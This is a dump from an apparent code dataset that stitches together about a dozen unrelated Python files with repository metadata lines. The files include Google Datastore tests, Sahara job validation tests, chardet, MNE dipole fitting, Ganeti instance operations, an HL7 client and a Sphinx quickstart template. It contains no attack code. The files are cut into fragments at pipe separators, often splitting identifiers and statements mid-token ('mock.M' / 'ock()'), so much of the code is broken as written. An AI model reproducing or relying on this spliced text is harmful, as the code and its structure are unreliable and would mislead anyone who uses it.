class TestClient(unittest.TestCase):
PROJECT = "PROJECT"
@staticmethod
def _get_target_class():
from google.cloud.datastore.client import Client
return Client
def _make_one(
self,
project=PROJECT,
namespace=None,
credentials=None,
client_info=None,
client_options=None,
_http=None,
_use_grpc=None,
):
return self._get_target_class()(
project=project,
namespace=namespace,
credentials=credentials,
client_info=client_info,
client_options=client_options,
_http=_http,
_use_grpc=_use_grpc,
)
def test_constructor_w_project_no_environ(self):
# Some environments (e.g. AppVeyor CI) run in GCE, so
# this test would fail artificially.
patch = mock.patch(
"google.cloud.datastore.client._base_default_project", return_value=None
)
with patch:
self.assertRaises(EnvironmentError, self._make_one, None)
def test_constructor_w_implicit_inputs(self):
from google.cloud.datastore.client import _CLIENT_INFO
from google.cloud.datastore.client import _DATASTORE_BASE_URL
other = "other"
creds = _make_credentials()
klass = self._get_target_class()
patch1 = mock.patch(
"google.cloud.datastore.client._determine_default_project",
return_value=other,
)
patch2 = mock.patch("google.auth.default", return_value=(creds, None))
with patch1 as _determine_default_project:
with patch2 as default:
client = klass()
self.assertEqual(client.project, other)
self.assertIsNone(client.namespace)
self.assertIs(client._credentials, creds)
self.assertIs(client._client_info, _CLIENT_INFO)
self.assertIsNone(client._http_internal)
self.assertIsNone(client._client_options)
self.assertEqual(client.base_url, _DATASTORE_BASE_URL)
self.assertIsNone(client.current_batch)
self.assertIsNone(client.current_transaction)
default.assert_called_once_with()
_determine_default_project.assert_called_once_with(None)
def test_constructor_w_explicit_inputs(self):
from google.api_core.client_options import ClientOptions
other = "other"
namespace = "namespace"
creds = _make_credentials()
client_info = mock.M
|
ock()
client_options = ClientOptions("endpoint")
http = object()
client = self._make_one(
project=other,
namespace=namespace,
credentials=creds,
client_info=client_info,
client_options=client_options,
_http=http,
)
self.ass
|
ertEqual(client.project, other)
self.assertEqual(client.namespace, namespace)
self.assertIs(client._credentials, creds)
self.assertIs(client._client_info, client_info)
self.assertIs(client._http_internal, http)
self.assertIsNone(client.current_batch)
self.assertIs(client._base_url, "endpoint")
self.assertEqual(list(client._batch_stack), [])
def test_constructor_use_grpc_default(self):
import google.cloud.datastore.client as MUT
project = "PROJECT"
creds = _make_credentials()
http = object()
with mock.patch.object(MUT, "_USE_GRPC", new=True):
client1 = self._make_one(project=project, credentials=creds, _http=http)
self.assertTrue(client1._use_grpc)
# Explicitly over-ride the environment.
client2 = self._make_one(
project=project, credentials=creds, _http=http, _use_grpc=False
)
self.assertFalse(client2._use_grpc)
with mock.patch.object(MUT, "_USE_GRPC", new=False):
client3 = self._make_one(project=project, credentials=creds, _http=http)
self.assertFalse(client3._use_grpc)
# Explicitly over-ride the environment.
client4 = self._make_one(
project=project, credentials=creds, _http=http, _use_grpc=True
)
self.assertTrue(client4._use_grpc)
def test_constructor_gcd_host(self):
from google.cloud.environment_vars import GCD_HOST
host = "localhost:1234"
fake_environ = {GCD_HOST: host}
project
|
sostenibilidad-unam/sleuth_automation
|
bin/status.py
|
Python
|
gpl-3.0
| 373
| 0.005362
|
#!/usr/bin/env python
import pickle
import argparse
from pprint import pprint
description = """
print out run status from pickled Location object
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument('pickle', type=argparse.FileTyp
|
e('r'), help='path to location pickle')
args = parser.
|
parse_args()
l = pickle.load(args.pickle)
pprint(l)
|
tellesnobrega/storm_plugin
|
sahara/tests/unit/service/validation/edp/test_job_executor_java.py
|
Python
|
apache-2.0
| 2,252
| 0
|
# Copyright (c) 2013 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific la
|
nguage governing permissions and
# limitations under the License.
import uuid
import mock
import six
from sahara.service.validations.edp import job_executor as je
from sahara.tests.unit.service.validation import utils as u
from sahara.utils import edp
def wrap_it(data):
je.check_job_executor(data, 0)
clas
|
s FakeJob(object):
type = edp.JOB_TYPE_JAVA
libs = []
class TestJobExecJavaValidation(u.ValidationTestCase):
def setUp(self):
super(TestJobExecJavaValidation, self).setUp()
self._create_object_fun = wrap_it
self.scheme = je.JOB_EXEC_SCHEMA
@mock.patch('sahara.service.validations.base.check_edp_job_support')
@mock.patch('sahara.service.validations.base.check_cluster_exists')
@mock.patch('sahara.service.edp.api.get_job')
def test_java(self, get_job, check_cluster, check_oozie):
check_cluster.return_value = True
check_oozie.return_value = None
get_job.return_value = FakeJob()
self._assert_create_object_validation(
data={
"cluster_id": six.text_type(uuid.uuid4()),
"job_configs": {"configs": {},
"params": {},
"args": []}
},
bad_req_i=(1, "INVALID_DATA",
"Java job must "
"specify edp.java.main_class"))
self._assert_create_object_validation(
data={
"cluster_id": six.text_type(uuid.uuid4()),
"job_configs": {
"configs": {
"edp.java.main_class": "org.me.myclass"},
"params": {},
"args": []}
})
|
insiderr/insiderr-app
|
app/modules/requests/packages/chardet/mbcharsetprober.py
|
Python
|
gpl-3.0
| 3,269
| 0.000306
|
# ####################### BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
if self._mCodingSM:
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingSt
|
ate == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
|
self._mLastChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
return self._mDistributionAnalyzer.get_confidence()
|
pelgoros/kwyjibo
|
revisions/urls.py
|
Python
|
gpl-3.0
| 232
| 0.017241
|
from django.conf.urls import url
from . import views
app_name = 'revisions'
urlpatterns = [
url(r'^revision/$', views.RevisionView.as_view
|
(), name = 'revisio
|
n'),
url(r'^mail/$', views.MailView.as_view(), name = 'mail'),
]
|
kambysese/mne-python
|
mne/dipole.py
|
Python
|
bsd-3-clause
| 57,802
| 0.000017
|
# -*- coding: utf-8 -*-
"""Single-dipole functions and classes."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Eric Larson <larson.eric.d@gmail.com>
#
# License: Simplified BSD
from copy import deepcopy
import functools
from functools import partial
import re
import numpy as np
from .cov import read_cov, compute_whitener
from .io.constants import FIFF
from .io.pick import pick_types
from .io.proj import make_projector, _needs_eeg_average_ref_proj
from .bem import _fit_sphere
from .evoked import _read_evoked, _aspect_rev, _write_evokeds
from .transforms import _print_coord_trans, _coord_frame_name, apply_trans
from .viz.evoked import _plot_evoked
from .forward._make_forward import (_get_trans, _setup_bem,
_prep_meg_channels, _prep_eeg_channels)
from .forward._compute_forward import (_compute_forwards_meeg,
_prep_field_computation)
from .surface import (transform_surface_to, _compute_nearest,
_points_outside_surface)
from .bem import _bem_find_surface, _bem_surf_name
from .source_space import _make_volume_source_space, SourceSpaces, head_to_mni
from .parallel import parallel_func
from .utils import (logger, verbose, _time_mask, warn, _check_fname,
check_fname, _pl, fill_doc, _check_option, ShiftTimeMixin,
_svd_lwork, _repeated_svd, _get_blas_funcs)
@fill_doc
class Dipole(object):
u"""Dipole class for sequential dipole fits.
.. note:: This class should usually not be instantiated directly,
instead :func:`mne.read_dipole` should be used.
Used to store positions, orientations, amplitudes, times, goodness of fit
of dipoles, typically obtained with Neuromag/xfit, mne_dipole_fit
or certain inverse solvers. Note that dipole position vectors are given in
the head coordinate frame.
Parameters
----------
times : array, shape (n_dipoles,)
The time instants at which each dipole was fitted (sec).
pos : array, shape (n_dipoles, 3)
The dipoles positions (m) in head coordinates.
amplitude : array, shape (n_dipoles,)
The amplitude of the dipoles (Am).
ori : array, shape (n_dipoles, 3)
The dipole orientations (normalized to unit length).
gof : array, shape (n_dipoles,)
The goodness of fit.
name : str | None
Name of the dipole.
conf : dict
Confidence limits in dipole orientation for "vol" in m^3 (volume),
"depth" in m (along the depth axis), "long" in m (longitudinal axis),
"trans" in m (transverse axis), "qlong" in Am, and "qtrans" in Am
(currents). The current confidence limit in the depth direction
|
is
assumed to be zero (although it can be non-zero when a BEM is us
|
ed).
.. versionadded:: 0.15
khi2 : array, shape (n_dipoles,)
The χ^2 values for the fits.
.. versionadded:: 0.15
nfree : array, shape (n_dipoles,)
The number of free parameters for each fit.
.. versionadded:: 0.15
%(verbose)s
See Also
--------
fit_dipole
DipoleFixed
read_dipole
Notes
-----
This class is for sequential dipole fits, where the position
changes as a function of time. For fixed dipole fits, where the
position is fixed as a function of time, use :class:`mne.DipoleFixed`.
"""
@verbose
def __init__(self, times, pos, amplitude, ori, gof,
name=None, conf=None, khi2=None, nfree=None,
verbose=None): # noqa: D102
self.times = np.array(times)
self.pos = np.array(pos)
self.amplitude = np.array(amplitude)
self.ori = np.array(ori)
self.gof = np.array(gof)
self.name = name
self.conf = dict()
if conf is not None:
for key, value in conf.items():
self.conf[key] = np.array(value)
self.khi2 = np.array(khi2) if khi2 is not None else None
self.nfree = np.array(nfree) if nfree is not None else None
self.verbose = verbose
def __repr__(self): # noqa: D105
s = "n_times : %s" % len(self.times)
s += ", tmin : %0.3f" % np.min(self.times)
s += ", tmax : %0.3f" % np.max(self.times)
return "<Dipole | %s>" % s
@verbose
def save(self, fname, overwrite=False, *, verbose=None):
"""Save dipole in a .dip or .bdip file.
Parameters
----------
fname : str
The name of the .dip or .bdip file.
%(overwrite)s
.. versionadded:: 0.20
%(verbose_meth)s
Notes
-----
.. versionchanged:: 0.20
Support for writing bdip (Xfit binary) files.
"""
# obligatory fields
fname = _check_fname(fname, overwrite=overwrite)
if fname.endswith('.bdip'):
_write_dipole_bdip(fname, self)
else:
_write_dipole_text(fname, self)
@fill_doc
def crop(self, tmin=None, tmax=None, include_tmax=True):
"""Crop data to a given time interval.
Parameters
----------
tmin : float | None
Start time of selection in seconds.
tmax : float | None
End time of selection in seconds.
%(include_tmax)s
Returns
-------
self : instance of Dipole
The cropped instance.
"""
sfreq = None
if len(self.times) > 1:
sfreq = 1. / np.median(np.diff(self.times))
mask = _time_mask(self.times, tmin, tmax, sfreq=sfreq,
include_tmax=include_tmax)
for attr in ('times', 'pos', 'gof', 'amplitude', 'ori',
'khi2', 'nfree'):
if getattr(self, attr) is not None:
setattr(self, attr, getattr(self, attr)[mask])
for key in self.conf.keys():
self.conf[key] = self.conf[key][mask]
return self
def copy(self):
"""Copy the Dipoles object.
Returns
-------
dip : instance of Dipole
The copied dipole instance.
"""
return deepcopy(self)
@verbose
def plot_locations(self, trans, subject, subjects_dir=None,
mode='orthoview', coord_frame='mri', idx='gof',
show_all=True, ax=None, block=False, show=True,
scale=5e-3, color=(1.0, 0.0, 0.0), fig=None,
verbose=None, title=None):
"""Plot dipole locations in 3d.
Parameters
----------
trans : dict
The mri to head trans.
subject : str
The subject name corresponding to FreeSurfer environment
variable SUBJECT.
%(subjects_dir)s
mode : str
Can be ``'arrow'``, ``'sphere'`` or ``'orthoview'``.
.. versionadded:: 0.14.0
coord_frame : str
Coordinate frame to use, 'head' or 'mri'. Defaults to 'mri'.
.. versionadded:: 0.14.0
idx : int | 'gof' | 'amplitude'
Index of the initially plotted dipole. Can also be 'gof' to plot
the dipole with highest goodness of fit value or 'amplitude' to
plot the dipole with the highest amplitude. The dipoles can also be
browsed through using up/down arrow keys or mouse scroll. Defaults
to 'gof'. Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
show_all : bool
Whether to always plot all the dipoles. If True (default), the
active dipole is plotted as a red dot and it's location determines
the shown MRI slices. The the non-active dipoles are plotted as
small blue dots. If False, only the active dipole is plotted.
Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
ax : instance of matplotlib Axes3D | None
Axes to plot into. If None (default), axes will be created.
Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
block : bool
|
crs4/hl7apy
|
examples/iti_21/client.py
|
Python
|
mit
| 1,870
| 0.004813
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2018, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
from hl7apy.parser import parse_message
def query(host, port):
msg = \
'MSH|^~\&|REC APP|REC FAC|SEND APP|SEND FAC|20110708163513||QBP^Q22^QBP_Q21|111069|D|2.5|||||ITA||EN\r' \
'QPD|IHE PDQ Query|111069|@PID.5.2^SMITH||||\r' \
'RCP|I|'
# establish th
|
e connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
# send the message
sock.sendall(parse_message(msg).to_mllp().encode('UTF-8'))
# receive the answer
received = sock.recv(1024*1024)
return r
|
eceived
finally:
sock.close()
if __name__ == '__main__':
res = query('localhost', 6789)
print("Received response: ")
print(repr(res))
|
badp/ganeti
|
lib/cmdlib/instance_operation.py
|
Python
|
gpl-2.0
| 17,072
| 0.007908
|
#
#
# Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Logical units dealing with instance operations (start/stop/...).
Those operations have in common that they affect the operating system in a
running instance directly.
"""
import logging
from ganeti import constants
from ganeti import errors
from ganeti import hypervisor
from ganeti import locking
from ganeti import objects
from ganeti import utils
from ganeti.cmdlib.base import LogicalUnit, NoHooksLU
from ganeti.cmdlib.common import INSTANCE_ONLINE, INSTANCE_DOWN, \
CheckHVParams, CheckInstanceState, CheckNodeOnline, GetUpdatedParams, \
CheckOSParams, ShareAll
from ganeti.cmdlib.instance_storage import StartInstanceDisks, \
ShutdownInstanceDisks
from ganeti.cmdlib.instance_utils import BuildInstanceHookEnvByObject, \
CheckInstanceBridgesExist, CheckNodeFreeMemory, CheckNodeHasOS
from ganeti.hypervisor import hv_base
class LUInstanceStartup(LogicalUnit):
"""Starts an instance.
"""
HPATH = "instance-start"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def CheckArguments(self):
# extra beparams
if self.op.beparams:
# fill the beparams dict
objects.UpgradeBeParams(self.op.beparams)
utils.ForceDictType(self.op.beparams, constants.BES_PARAMETER_TYPES)
def ExpandNames(self):
self._ExpandAndLockInstance()
self.recalculate_locks[locking.LEVEL_NODE_RES] = constants.LOCKS_REPLACE
def DeclareLocks(self, level):
if level == locking.LEVEL_NODE_RES:
self._LockInstancesNodes(primary_only=True, level=locking.LEVEL_NODE_RES)
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = {
"FORCE": self.op.force,
}
env.update(BuildInstanceHookEnvByObject(self, self.instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
cluster = self.cfg.GetClusterInfo()
# extra hvparams
if self.op.hvparams:
# check hypervisor parameter syntax (locally)
utils.ForceDictType(self.op.hvparams, constants.HVS_PARAMETER_TYPES)
filled_hvp = cluster.FillHV(self.instance)
filled_hvp.update(self.op.hvparams)
hv_type = hypervisor.GetHypervisorClass(self.instance.hypervisor)
hv_type.CheckParameterSyntax(filled_hvp)
CheckHVParams(self, self.instance.all_nodes, self.instance.hypervisor,
filled_hvp)
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
self.primary_offline = \
self.cfg.GetNodeInfo(self.instance.primary_node).offline
if self.primary_offline and self.op.ignore_offline_nodes:
self.LogWarning("Ignoring offline primary node")
if self.op.hvparams or self.op.beparams:
self.LogWarning("Overridden parameters are ignored")
else:
|
CheckNodeOnline(self, self.instance.primary_node)
bep = self.cfg.GetClusterInfo().FillBE(self.instance)
bep.update(self.op.beparams)
# check bridges existence
CheckInstanceBridgesExi
|
st(self, self.instance)
remote_info = self.rpc.call_instance_info(
self.instance.primary_node, self.instance.name,
self.instance.hypervisor, cluster.hvparams[self.instance.hypervisor])
remote_info.Raise("Error checking node %s" %
self.cfg.GetNodeName(self.instance.primary_node),
prereq=True, ecode=errors.ECODE_ENVIRON)
if remote_info.payload:
if hv_base.HvInstanceState.IsShutdown(remote_info.payload["state"]):
raise errors.OpPrereqError("Instance '%s' was shutdown by the user,"
" please shutdown the instance before"
" starting it again" % self.instance.name,
errors.ECODE_INVAL)
else: # not running already
CheckNodeFreeMemory(
self, self.instance.primary_node,
"starting instance %s" % self.instance.name,
bep[constants.BE_MINMEM], self.instance.hypervisor,
self.cfg.GetClusterInfo().hvparams[self.instance.hypervisor])
def Exec(self, feedback_fn):
"""Start the instance.
"""
if not self.op.no_remember:
self.cfg.MarkInstanceUp(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as started")
else:
StartInstanceDisks(self, self.instance, self.op.force)
result = \
self.rpc.call_instance_start(self.instance.primary_node,
(self.instance, self.op.hvparams,
self.op.beparams),
self.op.startup_paused, self.op.reason)
msg = result.fail_msg
if msg:
ShutdownInstanceDisks(self, self.instance)
raise errors.OpExecError("Could not start instance: %s" % msg)
class LUInstanceShutdown(LogicalUnit):
"""Shutdown an instance.
"""
HPATH = "instance-stop"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = BuildInstanceHookEnvByObject(self, self.instance)
env["TIMEOUT"] = self.op.timeout
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
if not self.op.force:
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
else:
self.LogWarning("Ignoring offline instance check")
self.primary_offline = \
self.cfg.GetNodeInfo(self.instance.primary_node).offline
if self.primary_offline and self.op.ignore_offline_nodes:
self.LogWarning("Ignoring offline primary node")
else:
CheckNodeOnline(self, self.instance.primary_node)
def Exec(self, feedback_fn):
"""Shutdown the instance.
"""
# If the instance is offline we shouldn't mark it as down, as that
# resets the offline flag.
if not self.op.no_remember and self.instance.admin_state in INSTANCE_ONLINE:
self.cfg.MarkInstanceDown(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as stopped")
else:
result = self.rpc.call_instance_shutdown(
self.instance.primary_node,
self.instance,
self.op.timeout, self.op.reason)
msg = result.fail_msg
if msg:
self.LogWarning("Could not shutdown instance: %s", msg)
ShutdownInstanceDisks(self, self.instance)
cl
|
pezia/poker-croupier
|
player/py/lib/api/player_strategy/__init__.py
|
Python
|
gpl-2.0
| 52
| 0
|
__all
|
__ = ['ttypes',
|
'constants', 'PlayerStrategy']
|
verpoorten/immobilier
|
main/forms/suivi.py
|
Python
|
agpl-3.0
| 3,478
| 0.004037
|
##############################################################################
#
# Immobilier it's an application
# designed to manage the core business of property management, buildings,
# rental agreement and so on.
#
# Copyright (C) 2016-2018 Verpoorten Leïla
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
See the
# GNU General Public License for more det
|
ails.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django import forms
from main import models as mdl
from main.forms.utils.datefield import DatePickerInput, DATE_FORMAT
from main.models.enums import etat_suivi as etat_suivi_enum
READONLY_ATTR = "disabled"
class SuiviForm(forms.ModelForm):
# date_paiement = forms.HiddenInput()
# financement_location = forms.HiddenInput()
date_paiement_reel = forms.DateField(widget=DatePickerInput(format=DATE_FORMAT),
input_formats=[DATE_FORMAT, ],
required=False)
class Meta:
model = mdl.suivi_loyer.SuiviLoyer
fields = ['date_paiement', 'financement_location', 'etat_suivi', 'remarque', 'loyer_percu', 'charges_percu',
'date_paiement_reel']
def __init__(self, *args, **kwargs):
super(SuiviForm, self).__init__(*args, **kwargs)
self.fields['date_paiement'].widget = forms.HiddenInput()
self.fields['financement_location'].widget = forms.HiddenInput()
self.fields['date_paiement_reel'].help_text = '(Double clic = date du jour)'
if self.instance:
self.fields['loyer_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.loyer)
self.fields['charges_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.charges)
def clean(self):
self.validate_dates()
self.validate_status()
def validate_status(self):
if self.cleaned_data.get("etat_suivi") == etat_suivi_enum.PAYE and \
(self.cleaned_data.get("loyer_percu") is None or self.cleaned_data.get("loyer_percu") == 0) and \
(self.cleaned_data.get("charges_percu") is None or self.cleaned_data.get("charges_percu") == 0):
msg = u"L'état ne peut pas être à 'PAYE' si aucun montant n'est introduit pour les loyer/charge percue(s)"
self._errors["etat_suivi"] = self.error_class([msg])
def validate_dates(self):
date_paiement = self.cleaned_data.get("date_paiement")
date_paiement_reel = self.cleaned_data.get("date_paiement_reel")
if date_paiement_reel and date_paiement and date_paiement_reel < date_paiement:
msg = u"La date réelle de paiement doit être supérieure ou égale à la date supposée du paiement"
self._errors["date_paiement_reel"] = self.error_class([msg])
|
creasyw/IMTAphy
|
documentation/doctools/tags/0.4.2/sphinx/quickstart.py
|
Python
|
gpl-2.0
| 15,064
| 0.001062
|
# -*- coding: utf-8 -*-
"""
sphinx.quickstart
~~~~~~~~~~~~~~~~~
Quickly setup documentation source to work with Sphinx.
:copyright: 2008 by Georg Brandl.
:license: BSD.
"""
import sys, os, time
from os import path
from sphinx.util import make_filename
from sphinx.util.console import purple, bold, red, nocolor
PROMPT_PREFIX = '> '
QUICKSTART_CONF = '''\
# -*- coding: utf-8 -*-
#
# %(project)s documentation build configuration file, created by
# sphinx-quickstart on %(now)s.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [%(extensions)s]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['%(dot)stemplates']
# The suffix of source filenames.
source_suffix = '%(suffix)s'
# The master toctree document.
master_doc = '%(master)s'
# General substitutions.
project = %(project)r
copyright = '%(year)s, %(author)s'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = '%(version)s'
# The full version, including alpha/beta/rc tags.
release = '%(release)s'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%%B %%d, %%Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
#exclude_dirs = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given i
|
n html_static_path.
html_style = 'default.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_s
|
hort_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['%(dot)sstatic']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%%b %%d, %%Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = '%(project_fn)sdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('%(master)s', '%(project_fn)s.tex', '%(project)s Documentation',
'%(author)s', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
'''
MASTER_FILE = '''\
.. %(project)s documentation master file, created by sphinx-quickstart on %(now)s.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to %(project)s's documentation!
===========%(underline)s=================
Contents:
.. toctree::
:maxdepth: 2
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
'''
